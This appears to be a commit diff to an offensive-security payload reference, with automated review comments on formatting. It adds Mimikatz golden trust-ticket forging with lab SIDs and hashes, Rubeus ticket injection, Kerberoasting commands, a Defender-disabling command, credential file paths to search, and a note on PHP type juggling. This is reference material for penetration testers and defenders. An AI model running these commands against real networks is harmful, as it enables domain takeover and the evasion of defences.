mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 02:38:50 +00:00
AMSI + Trust
parent: 78cc68674b
commit: 19a2950b8d
@ -1098,6 +1098,12 @@ Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
.\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
```
Alternatively with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
```powershell
Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
```
Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
```powershell
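Review bot: the new bifrost paragraph (`Alternatively on macOS machine you can use [bifrost]...`) opens its code block with a ```powershell fence, but bifrost is a macOS tool run from a shell, so the fence should be ```bash (or ```shell) to match the other non-Windows blocks in this file; the sentence should also read `on a macOS machine`.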
@ -1605,6 +1611,9 @@ Prerequisite:
### Forest to Forest Compromise - Trust Ticket
From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using
Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
#### Dumping trust passwords (trust keys)
> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts.
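Review bot: the added tip (`> Look for the trust name with a dollar ($) sign at the end...`) uses typographic quotes around “$” while the same section writes account names in backticks (`currentdomain\targetdomain$`); use backticks for consistency. The tip also does not say which output the reader should scan: since the next context header reads `or find the TRUST_NAME$ machine account hash`, state that the `$`-suffixed trust accounts are to be picked out of that dump output.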
@ -1619,12 +1628,14 @@ or find the TRUST_NAME$ machine account hash
```powershell
mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
```
#### Use the Trust Ticket file to get a TGS for the targeted service
```powershell
./asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
```
Inject the TGS file and access the targeted service with the spoofed rights.
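Review bot: the new `kerberos::golden` line carries `/sids:S-1-5-21-280534878-1496970234-700767426-519`, which is the SID-history entry for the target domain's Enterprise Admins group that the section text says must be added, but the generic line right above it (`/rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com`) has no `/sids:` at all, so a reader following the placeholder version forges a ticket without the group membership the section describes; add a `/sids:<TARGET_DOMAIN_SID>-519` placeholder to the generic line or a comment explaining why only the second line has it. In the next block, `./asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local` and `.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local` are the same command in two slash styles; keep one. The concrete values in the second golden line (`S-1-5-21-1874506631-...`, `/rc4:e4e47c8fc433c9e0f3b17ea74856ca6b`, `c:\ad\tools\mcorp-ticket.kirbi`) are lab-specific and should be labelled as such or replaced with the placeholder style the first line uses.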
735
Methodology and Resources/Windows - AMSI Bypass.md
Normal file
File diff suppressed because one or more lines are too long
@ -249,6 +249,7 @@ PS C:\> Get-MpComputerStatus
# disable Real Time Monitoring
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
```
### AppLocker Enumeration
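Review bot: the added `PS C:\> Set-MpPreference -DisableIOAVProtection $true` line has no explanatory comment, whereas the line before it is introduced by `# disable Real Time Monitoring`; add a comment such as `# disable IOAV protection (scanning of downloaded files and attachments)`, and, as the preceding line does with `; Get-MpComputerStatus`, show the status query afterwards so the reader can confirm which setting changed (it is reported as `IoavProtectionEnabled`).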
@ -426,6 +427,8 @@ C:\inetpub\wwwroot\web.config
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
```
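Review bot: the added `C:\Program Files\Windows PowerShell\*` entry has a space in the directory name, but the default folder is `C:\Program Files\WindowsPowerShell` (no space), so the glob as written matches nothing; verify and correct the name. While in this block, `dir c:*vnc.ini /s /b` and `dir c:*ultravnc.ini /s /b` lack the backslash after the drive letter, so `/s` recurses from the current directory on C: rather than from the root; write `dir c:\*vnc.ini /s /b`. The new `C:\ProgramData\Configs\*` line would also benefit from a short note on what is expected there, as the neighbouring `web.config` and `hosts` entries are self-explanatory and this one is not.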
@ -7,6 +7,8 @@ PHP provides two ways to compare two variables:
PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs.
> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead.
## Type Juggling
### True statements
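Review bot: the added blockquote (`> PHP8 won't try to cast string into numbers anymore...`) reads as a quotation from an external write-up but carries no attribution or link; add the source, and link the two RFCs it names (“Saner string to number comparisons” and “Consistent type errors for internal functions”) so readers can verify the PHP 8 behaviour claimed for `0 == strcmp(...)` and the `0e` hash comparisons. Minor wording: `and the likes` should be `and the like`.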